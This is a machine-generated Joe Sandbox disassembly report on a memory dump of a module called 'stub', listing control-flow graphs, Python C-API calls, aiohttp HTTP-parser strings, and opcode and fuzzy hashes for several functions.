                                                                                                                                                                                                                                    • API ID: Dealloc$Object_$InitTrack
                                                                                                                                                                                                                                    • String ID: aiohttp._http_parser._new_response_message
                                                                                                                                                                                                                                    • API String ID: 3803614613-3861257606
                                                                                                                                                                                                                                    • Opcode ID: 49d4f52b81de02b1e498f8b259fceaa06bfdc536de3bf34ca3d3053dbc308f90
                                                                                                                                                                                                                                    • Instruction ID: 4a16b8676ac4b2915eb0e3b401e1e00a9cc94a673c96f1caedd8429a8ff36aa3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49d4f52b81de02b1e498f8b259fceaa06bfdc536de3bf34ca3d3053dbc308f90
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52A10AB6A0AE16C1E71AAF36E8801787378FB54B96F144175CE5D93368DF3EE4528320
                                                                                                                                                                                                                                    Function 00007FFBAAF113E3 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 202COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 6721 7ffbaaf113e3-7ffbaaf11460 PyDict_Size 6723 7ffbaaf116ac-7ffbaaf116af 6721->6723 6724 7ffbaaf11466-7ffbaaf1146e 6721->6724 6725 7ffbaaf11925-7ffbaaf1192a 6723->6725 6726 7ffbaaf116b5-7ffbaaf116df call 7ffbaaf26480 6723->6726 6724->6723 6728 7ffbaaf1192f-7ffbaaf1193e call 7ffbaaf2a130 6725->6728 6731 7ffbaaf116e5-7ffbaaf11b7b 6726->6731 6732 7ffbaaf11897-7ffbaaf118b4 6726->6732 6735 7ffbaaf1195b-7ffbaaf11968 6728->6735 6736 7ffbaaf11940-7ffbaaf11949 PyErr_Occurred 6728->6736 6737 7ffbaaf11b81-7ffbaaf11b94 call 7ffbaaf29db0 6731->6737 6732->6728 6739 7ffbaaf11995 6735->6739 6740 7ffbaaf1196a-7ffbaaf11978 call 7ffbaaf2a1d0 6735->6740 6736->6735 6738 7ffbaaf1194b-7ffbaaf11956 6736->6738 6751 7ffbaaf11b99-7ffbaaf11bbf call 7ffbaaf32dc0 6737->6751 6738->6737 6742 7ffbaaf1199a-7ffbaaf119a1 6739->6742 6740->6742 6748 7ffbaaf1197a-7ffbaaf11983 PyErr_Occurred 6740->6748 6745 7ffbaaf119ce 6742->6745 6746 7ffbaaf119a3-7ffbaaf119b1 call 7ffbaaf2a1d0 6742->6746 6750 7ffbaaf119d7-7ffbaaf119da 6745->6750 6746->6750 6759 7ffbaaf119b3-7ffbaaf119bc PyErr_Occurred 6746->6759 6748->6742 6752 7ffbaaf11985-7ffbaaf11990 6748->6752 6754 7ffbaaf119dc-7ffbaaf119eb call 7ffbaaf2a1d0 6750->6754 6755 7ffbaaf11a08-7ffbaaf11a17 6750->6755 6752->6737 6754->6755 6767 7ffbaaf119ed-7ffbaaf119f6 PyErr_Occurred 6754->6767 6757 7ffbaaf11a72 6755->6757 6758 7ffbaaf11a19-7ffbaaf11a45 6755->6758 6764 7ffbaaf11a74-7ffbaaf11a7b 6757->6764 6762 7ffbaaf11a52-7ffbaaf11a55 6758->6762 6763 7ffbaaf11a47-7ffbaaf11a50 PyObject_IsTrue 6758->6763 6759->6750 6765 7ffbaaf119be-7ffbaaf119c9 6759->6765 6762->6764 6768 7ffbaaf11a57-7ffbaaf11a60 PyErr_Occurred 6762->6768 6763->6762 6769 7ffbaaf11a7d-7ffbaaf11a88 call 7ffbaaf2bcb0 6764->6769 6770 7ffbaaf11aa5-7ffbaaf11aa8 6764->6770 6765->6737 6767->6755 6773 7ffbaaf119f8-7ffbaaf11a03 6767->6773 6768->6764 6774 7ffbaaf11a62-7ffbaaf11a6d 6768->6774 6769->6770 6781 7ffbaaf11a8a-7ffbaaf11a93 PyErr_Occurred 6769->6781 6771 7ffbaaf11ad4-7ffbaaf11b1e call 7ffbaaf11c40 6770->6771 6772 7ffbaaf11aaa-7ffbaaf11ab7 call 7ffbaaf2bcb0 6770->6772 6771->6751 6772->6771 6782 7ffbaaf11ab9-7ffbaaf11ac2 PyErr_Occurred 6772->6782 6773->6737 6774->6737 6781->6770 6783 7ffbaaf11a95-7ffbaaf11aa0 6781->6783 6782->6771 6784 7ffbaaf11ac4-7ffbaaf11acf 6782->6784 6783->6737 6784->6737
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Dict_Size
                                                                                                                                                                                                                                    • String ID: __init__$aiohttp._http_parser.HttpResponseParser.__init__
                                                                                                                                                                                                                                    • API String ID: 1288431816-2665069032
                                                                                                                                                                                                                                    • Opcode ID: 3de5ab0a6b543b37f0749c4b3a7f8ae53f4062ceb7ede6c9c00f8444f2cb14e4
                                                                                                                                                                                                                                    • Instruction ID: b55ad447f283da4884b19e6188494fbf5f4a9bd8368914c10d986abca20dbfb2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3de5ab0a6b543b37f0749c4b3a7f8ae53f4062ceb7ede6c9c00f8444f2cb14e4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA918FB5B0AB01C5FF5A9B71E4401A92BA8FB45BA4F14027ADE6D83BD4DF3DD0428724
                                                                                                                                                                                                                                    Function 00007FFBAAF28820 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 6785 7ffbaaf28820-7ffbaaf28848 6786 7ffbaaf2884e-7ffbaaf2885a 6785->6786 6787 7ffbaaf28a18-7ffbaaf28a29 6785->6787 6786->6787 6788 7ffbaaf28860-7ffbaaf2887e PyMem_Malloc 6786->6788 6789 7ffbaaf2888b-7ffbaaf2888e 6788->6789 6790 7ffbaaf28880-7ffbaaf28886 PyErr_NoMemory 6788->6790 6791 7ffbaaf288b1-7ffbaaf288c0 PyTuple_New 6789->6791 6792 7ffbaaf28890-7ffbaaf28899 6789->6792 6793 7ffbaaf289fe-7ffbaaf28a17 6790->6793 6795 7ffbaaf288c2-7ffbaaf288cb PyMem_Free 6791->6795 6796 7ffbaaf288d0-7ffbaaf288fb PyDict_Next 6791->6796 6794 7ffbaaf288a0-7ffbaaf288af 6792->6794 6794->6791 6794->6794 6795->6793 6797 7ffbaaf28901-7ffbaaf28918 6796->6797 6798 7ffbaaf289a6-7ffbaaf289be 6796->6798 6799 7ffbaaf28920-7ffbaaf28976 PyDict_Next 6797->6799 6803 7ffbaaf289c1-7ffbaaf289c5 6798->6803 6799->6799 6800 7ffbaaf28978-7ffbaaf28989 6799->6800 6800->6798 6802 7ffbaaf2898b-7ffbaaf289a4 PyErr_SetString 6800->6802 6802->6803 6804 7ffbaaf289d0-7ffbaaf289d3 6803->6804 6805 7ffbaaf289c7-7ffbaaf289ca _Py_Dealloc 6803->6805 6806 7ffbaaf289ed-7ffbaaf289fb PyMem_Free 6804->6806 6807 7ffbaaf289d5-7ffbaaf289dd 6804->6807 6805->6804 6806->6793 6808 7ffbaaf289df _Py_Dealloc 6807->6808 6809 7ffbaaf289e5-7ffbaaf289eb 6807->6809 6808->6809 6809->6806 6809->6807
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Mem_$Err_FreeMallocMemoryTuple_
                                                                                                                                                                                                                                    • String ID: keywords must be strings
                                                                                                                                                                                                                                    • API String ID: 4138657551-2673384963
                                                                                                                                                                                                                                    • Opcode ID: 2ad6c86c8ab959b5e402209c1c492fe9cb2ae27a522832f2cbb9f0e704cb74a7
                                                                                                                                                                                                                                    • Instruction ID: 072c2abd7ddc9fac9044847b4b8aa43ebeae1fc10e9737146b6af63f09676f6f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ad6c86c8ab959b5e402209c1c492fe9cb2ae27a522832f2cbb9f0e704cb74a7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F518B7660AB85C1DA2A9F35E4542BAB3A8FB85FC5F444071CE9D87714DE3ED00AC360
                                                                                                                                                                                                                                    Function 00007FFBAAF11C40 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 6810 7ffbaaf11c40-7ffbaaf11cdf 6812 7ffbaaf11ce1-7ffbaaf11cf2 6810->6812 6813 7ffbaaf11cf7-7ffbaaf11cfb 6810->6813 6814 7ffbaaf11e52-7ffbaaf11e6b call 7ffbaaf29db0 6812->6814 6815 7ffbaaf11cfd-7ffbaaf11d00 _Py_Dealloc 6813->6815 6816 7ffbaaf11d06-7ffbaaf11d1b 6813->6816 6829 7ffbaaf11ea4-7ffbaaf11eb9 6814->6829 6815->6816 6817 7ffbaaf11d1d-7ffbaaf11d27 6816->6817 6818 7ffbaaf11d7e-7ffbaaf11db7 _PyDict_GetItem_KnownHash 6816->6818 6820 7ffbaaf11d38-7ffbaaf11d51 call 7ffbaaf25c40 6817->6820 6821 7ffbaaf11d29-7ffbaaf11d33 6817->6821 6822 7ffbaaf11dbe-7ffbaaf11dc7 PyErr_Occurred 6818->6822 6823 7ffbaaf11db9-7ffbaaf11dbc 6818->6823 6825 7ffbaaf11dd8-7ffbaaf11ddb 6820->6825 6836 7ffbaaf11d57-7ffbaaf11d60 PyErr_Occurred 6820->6836 6821->6825 6827 7ffbaaf11dcd-7ffbaaf11dd5 call 7ffbaaf25d60 6822->6827 6828 7ffbaaf11dc9-7ffbaaf11dcb 6822->6828 6823->6825 6832 7ffbaaf11ddd-7ffbaaf11dee 6825->6832 6833 7ffbaaf11df0-7ffbaaf11e19 6825->6833 6827->6825 6828->6825 6832->6814 6834 7ffbaaf11e1b-7ffbaaf11e24 PyObject_IsTrue 6833->6834 6835 7ffbaaf11e26-7ffbaaf11e31 6833->6835 6834->6835 6838 7ffbaaf11e6d-7ffbaaf11e70 6835->6838 6839 7ffbaaf11e33-7ffbaaf11e47 6835->6839 6836->6825 6840 7ffbaaf11d62-7ffbaaf11d7c PyErr_Format 6836->6840 6842 7ffbaaf11e7b-7ffbaaf11e7d 6838->6842 6843 7ffbaaf11e72-7ffbaaf11e75 _Py_Dealloc 6838->6843 6839->6814 6841 7ffbaaf11e49-7ffbaaf11e4c _Py_Dealloc 6839->6841 6840->6825 6841->6814 6844 7ffbaaf11e7f-7ffbaaf11e9e 6842->6844 6845 7ffbaaf11ea2 6842->6845 6843->6842 6844->6845 6845->6829
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Dealloc
                                                                                                                                                                                                                                    • String ID: aiohttp._http_parser.HttpResponseParser.__init__$name '%U' is not defined
                                                                                                                                                                                                                                    • API String ID: 3617616757-1353362044
                                                                                                                                                                                                                                    • Opcode ID: 210f50c79fc7f3b2777ac102fc579b19980f51764e2b74a3bb64277221ec94e0
                                                                                                                                                                                                                                    • Instruction ID: 79e3d4b2c3175cd9bcc2e55db2cf45fce1a8dcffcfb478e2edb20431962c914b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 210f50c79fc7f3b2777ac102fc579b19980f51764e2b74a3bb64277221ec94e0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 247151B5A0AB46C1EF5ADB35E8442B973A8FB94B80F14407ACE5D87750DF3EE4468320
                                                                                                                                                                                                                                    Function 00007FFBAAF0DFF0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 6846 7ffbaaf0dff0-7ffbaaf0e014 6847 7ffbaaf0e05c-7ffbaaf0e081 PyLong_FromLong 6846->6847 6848 7ffbaaf0e016-7ffbaaf0e01b 6846->6848 6851 7ffbaaf0e083-7ffbaaf0e08f 6847->6851 6852 7ffbaaf0e094-7ffbaaf0e0a3 PyLong_FromLong 6847->6852 6849 7ffbaaf0e01d-7ffbaaf0e020 6848->6849 6850 7ffbaaf0e03f-7ffbaaf0e05b call 7ffbaaf32dc0 6848->6850 6849->6847 6853 7ffbaaf0e022-7ffbaaf0e03e call 7ffbaaf32dc0 6849->6853 6855 7ffbaaf0e189-7ffbaaf0e1a2 call 7ffbaaf29db0 6851->6855 6856 7ffbaaf0e0c3-7ffbaaf0e0df 6852->6856 6857 7ffbaaf0e0a5-7ffbaaf0e0b5 6852->6857 6871 7ffbaaf0e1b6-7ffbaaf0e1df call 7ffbaaf32dc0 6855->6871 6862 7ffbaaf0e0e1-7ffbaaf0e0e8 6856->6862 6863 7ffbaaf0e105-7ffbaaf0e134 call 7ffbaaf27060 6856->6863 6857->6855 6861 7ffbaaf0e0bb-7ffbaaf0e0be 6857->6861 6868 7ffbaaf0e183 _Py_Dealloc 6861->6868 6862->6863 6864 7ffbaaf0e0ea-7ffbaaf0e0f8 6862->6864 6873 7ffbaaf0e145-7ffbaaf0e149 6863->6873 6874 7ffbaaf0e136-7ffbaaf0e13a 6863->6874 6869 7ffbaaf0e100 6864->6869 6870 7ffbaaf0e0fa _Py_Dealloc 6864->6870 6868->6855 6869->6863 6870->6869 6877 7ffbaaf0e14b-7ffbaaf0e14e _Py_Dealloc 6873->6877 6878 7ffbaaf0e154-7ffbaaf0e159 6873->6878 6874->6873 6876 7ffbaaf0e13c-7ffbaaf0e13f _Py_Dealloc 6874->6876 6876->6873 6877->6878 6880 7ffbaaf0e15b-7ffbaaf0e15e _Py_Dealloc 6878->6880 6881 7ffbaaf0e164-7ffbaaf0e167 6878->6881 6880->6881 6882 7ffbaaf0e1a4-7ffbaaf0e1a8 6881->6882 6883 7ffbaaf0e169-7ffbaaf0e178 6881->6883 6884 7ffbaaf0e1b3 6882->6884 6885 7ffbaaf0e1aa-7ffbaaf0e1ad _Py_Dealloc 6882->6885 6883->6855 6886 7ffbaaf0e17a-7ffbaaf0e17e 6883->6886 6884->6871 6885->6884 6886->6855 6887 7ffbaaf0e180 6886->6887 6887->6868
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • PyLong_FromLong.PYTHON310(?,?,?,?,?,?,?,?,?,?,?,00007FFBAAF0D4C9), ref: 00007FFBAAF0E075
                                                                                                                                                                                                                                    • PyLong_FromLong.PYTHON310(?,?,?,?,?,?,?,?,?,?,?,00007FFBAAF0D4C9), ref: 00007FFBAAF0E097
                                                                                                                                                                                                                                    • _Py_Dealloc.PYTHON310(?,?,?,?,?,?,?,?,?,?,?,00007FFBAAF0D4C9), ref: 00007FFBAAF0E183
                                                                                                                                                                                                                                    • _Py_Dealloc.PYTHON310(?,?,?,?,?,?,?,?,?,?,?,00007FFBAAF0D4C9), ref: 00007FFBAAF0E1AD
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DeallocFromLongLong_
                                                                                                                                                                                                                                    • String ID: aiohttp._http_parser.HttpParser.http_version
                                                                                                                                                                                                                                    • API String ID: 395642662-1245594736
                                                                                                                                                                                                                                    • Opcode ID: 0676bbce45c6629fb22c9b04cfd82541de9437e0ee97f2613885e20116441b1c
                                                                                                                                                                                                                                    • Instruction ID: d7254a7a08fcf464861c44be5e903868ae2041ca4ebbf81eba39e36cfe0064ce
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0676bbce45c6629fb22c9b04cfd82541de9437e0ee97f2613885e20116441b1c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF51A5B2E0AA52D1EB5A9F35F85017973A8EF94B81F0840B1CE5D97758EF2ED4438720
                                                                                                                                                                                                                                    Function 00007FFBAAF0F410 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 119COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 6888 7ffbaaf0f410-7ffbaaf0f457 6889 7ffbaaf0f45d-7ffbaaf0f463 6888->6889 6890 7ffbaaf0f4f7-7ffbaaf0f4fb 6888->6890 6893 7ffbaaf0f47d-7ffbaaf0f497 call 7ffbaaf26260 6889->6893 6894 7ffbaaf0f465-7ffbaaf0f469 6889->6894 6891 7ffbaaf0f4fd-7ffbaaf0f53c PyErr_Format 6890->6891 6892 7ffbaaf0f561 6890->6892 6895 7ffbaaf0f541-7ffbaaf0f55c call 7ffbaaf29db0 6891->6895 6898 7ffbaaf0f564-7ffbaaf0f58d 6892->6898 6905 7ffbaaf0f4e5-7ffbaaf0f4ee PyErr_Occurred 6893->6905 6906 7ffbaaf0f499 6893->6906 6894->6891 6896 7ffbaaf0f46f-7ffbaaf0f47b 6894->6896 6911 7ffbaaf0f5e3-7ffbaaf0f5fc 6895->6911 6900 7ffbaaf0f49c-7ffbaaf0f49f 6896->6900 6902 7ffbaaf0f58f-7ffbaaf0f598 PyObject_IsTrue 6898->6902 6903 7ffbaaf0f59a-7ffbaaf0f59d 6898->6903 6900->6898 6907 7ffbaaf0f4a5-7ffbaaf0f4d2 call 7ffbaaf26480 6900->6907 6902->6903 6908 7ffbaaf0f59f-7ffbaaf0f5a8 PyErr_Occurred 6903->6908 6909 7ffbaaf0f5ca-7ffbaaf0f5db 6903->6909 6905->6891 6910 7ffbaaf0f4f0-7ffbaaf0f4f5 6905->6910 6906->6900 6917 7ffbaaf0f4db-7ffbaaf0f4e0 6907->6917 6918 7ffbaaf0f4d4-7ffbaaf0f4d9 6907->6918 6908->6909 6913 7ffbaaf0f5aa-7ffbaaf0f5c8 call 7ffbaaf29db0 6908->6913 6914 7ffbaaf0f5e0 6909->6914 6910->6895 6913->6914 6914->6911 6917->6898 6918->6895
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Err_$FormatObject_OccurredTrue
                                                                                                                                                                                                                                    • String ID: %.200s() takes %.8s %zd positional argument%.1s (%zd given)$aiohttp._http_parser.HttpParser.set_upgraded$exactly$set_upgraded
                                                                                                                                                                                                                                    • API String ID: 1155888492-3043789788
                                                                                                                                                                                                                                    • Opcode ID: 5fa23940db4a5468b12f4a417c60fa5f7347dc21b4ff592f8d1a88be0150f99b
                                                                                                                                                                                                                                    • Instruction ID: af6f9c48f857a233048ffeaf0861227dfa404c94c09765010b633ca4481974da
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fa23940db4a5468b12f4a417c60fa5f7347dc21b4ff592f8d1a88be0150f99b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3451ACB5A0AB42D1EB1AEF31E4405B967A8FB84B90F544072DE5D937A4DF3EE046C320
                                                                                                                                                                                                                                    Function 00007FFBAAF18FD0 Relevance: 12.2, APIs: 8, Instructions: 170COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 6920 7ffbaaf18fd0-7ffbaaf18ff2 6921 7ffbaaf18ff4-7ffbaaf19029 PyObject_Init PyObject_GC_Track 6920->6921 6922 7ffbaaf19038-7ffbaaf1904a 6920->6922 6923 7ffbaaf1902f-7ffbaaf19037 6921->6923 6922->6923 6925 7ffbaaf1904c-7ffbaaf19075 6922->6925 6926 7ffbaaf190a3-7ffbaaf190ba PyObject_GC_UnTrack 6925->6926 6927 7ffbaaf19077-7ffbaaf1907f PyObject_GC_IsFinalized 6925->6927 6929 7ffbaaf190cc-7ffbaaf190d3 6926->6929 6930 7ffbaaf190bc-7ffbaaf190c4 6926->6930 6927->6926 6928 7ffbaaf19081-7ffbaaf19090 6927->6928 6928->6926 6931 7ffbaaf19092-7ffbaaf1909d PyObject_CallFinalizerFromDealloc 6928->6931 6933 7ffbaaf190e5-7ffbaaf190ec 6929->6933 6934 7ffbaaf190d5-7ffbaaf190dd 6929->6934 6930->6929 6932 7ffbaaf190c6 _Py_Dealloc 6930->6932 6931->6926 6935 7ffbaaf1914b-7ffbaaf1917f 6931->6935 6932->6929 6937 7ffbaaf190fe-7ffbaaf19121 6933->6937 6938 7ffbaaf190ee-7ffbaaf190f6 6933->6938 6934->6933 6936 7ffbaaf190df _Py_Dealloc 6934->6936 6939 7ffbaaf19181-7ffbaaf19188 6935->6939 6940 7ffbaaf1918a-7ffbaaf19191 6935->6940 6936->6933 6942 7ffbaaf1913c-7ffbaaf19143 6937->6942 6943 7ffbaaf19123-7ffbaaf1913b 6937->6943 6938->6937 6941 7ffbaaf190f8 _Py_Dealloc 6938->6941 6939->6940 6949 7ffbaaf191bf-7ffbaaf191ce 6939->6949 6944 7ffbaaf1919c-7ffbaaf191a3 6940->6944 6945 7ffbaaf19193-7ffbaaf1919a 6940->6945 6941->6937 6942->6935 6947 7ffbaaf191bd 6944->6947 6948 7ffbaaf191a5-7ffbaaf191b9 6944->6948 6945->6944 6945->6949 6947->6949 6948->6947
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Object_$Dealloc$Track$CallFinalizedFinalizerFromInit
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 689297262-0
                                                                                                                                                                                                                                    • Opcode ID: 1105732f36dce22c784bb94101f1a7eff4ec4526eb5912b4a688f9a661355dbb
                                                                                                                                                                                                                                    • Instruction ID: 45da036ff1fcf9598bc26a33c1df6beb474ad6f6389bf3691975bd5f54c85021
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1105732f36dce22c784bb94101f1a7eff4ec4526eb5912b4a688f9a661355dbb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B55195A6A1AB41C2EF1E9F76E88017467A8FF88B85F084175CE1D87354DF2ED4928350
                                                                                                                                                                                                                                    Function 00007FFBAAF26830 Relevance: 12.1, APIs: 8, Instructions: 114COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • PyErr_NormalizeException.PYTHON310(?,?,00007FFBAAF34788,00001768,00000000,00007FFBAAF26A0D,?,?,?,?,00007FFBAAF07A8E), ref: 00007FFBAAF26881
                                                                                                                                                                                                                                    • PyException_SetTraceback.PYTHON310(?,?,00007FFBAAF34788,00001768,00000000,00007FFBAAF26A0D,?,?,?,?,00007FFBAAF07A8E), ref: 00007FFBAAF268A3
                                                                                                                                                                                                                                    • _Py_Dealloc.PYTHON310(?,?,00007FFBAAF34788,00001768,00000000,00007FFBAAF26A0D,?,?,?,?,00007FFBAAF07A8E), ref: 00007FFBAAF26934
                                                                                                                                                                                                                                    • _Py_Dealloc.PYTHON310(?,?,00007FFBAAF34788,00001768,00000000,00007FFBAAF26A0D,?,?,?,?,00007FFBAAF07A8E), ref: 00007FFBAAF26948
                                                                                                                                                                                                                                    • _Py_Dealloc.PYTHON310(?,?,00007FFBAAF34788,00001768,00000000,00007FFBAAF26A0D,?,?,?,?,00007FFBAAF07A8E), ref: 00007FFBAAF2695C
                                                                                                                                                                                                                                    • _Py_Dealloc.PYTHON310(?,?,00007FFBAAF34788,00001768,00000000,00007FFBAAF26A0D,?,?,?,?,00007FFBAAF07A8E), ref: 00007FFBAAF2697F
